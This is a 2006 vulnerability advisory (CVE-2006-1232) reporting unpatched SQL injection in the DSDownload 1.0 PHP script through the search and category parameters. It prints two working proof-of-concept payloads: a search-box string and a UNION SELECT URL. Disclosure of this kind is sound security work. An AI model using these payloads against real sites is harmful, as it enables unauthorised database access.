Multiple SQL Injection in DSDownload
Summary
- Vulnerability
- Multiple SQL Injection in DSDownload
- Discovered
- 2006.03.12
- Last Update
- 2006.03.23 Exploitation code published
- ID
- EV0099
- CVE
- CVE-2006-1232
- Risk Level
- medium
- Type
- SQL Injection
- Status
- Unpatched. No reply from developer(s)
- Vendor
- n/a
- Vulnerable Software
- DSDownload (http://dsportal.uw.hu/)
- Version
- 1.0
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
SQL Injection found in DSDownload (http://dsportal.uw.hu/) script.
Vulnerable scripts:
search.php
downloads.php
Variables $key $category are not properly sanitized before being used in SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc = off
PoC/Exploit
SQL Injection Examples:
1) Example1
URL: http://[host]/dsdownload/index.php
Search: asd%'or(1)/*
2) Example2
http://[host]/dsdownload/downloads.php?category=999'%20union%20select%206,2,3,4,5,1,7,8/*
Solution.
Solution for "Multiple SQL Injection in DSDownload" is not available. Check vendor's website for updates.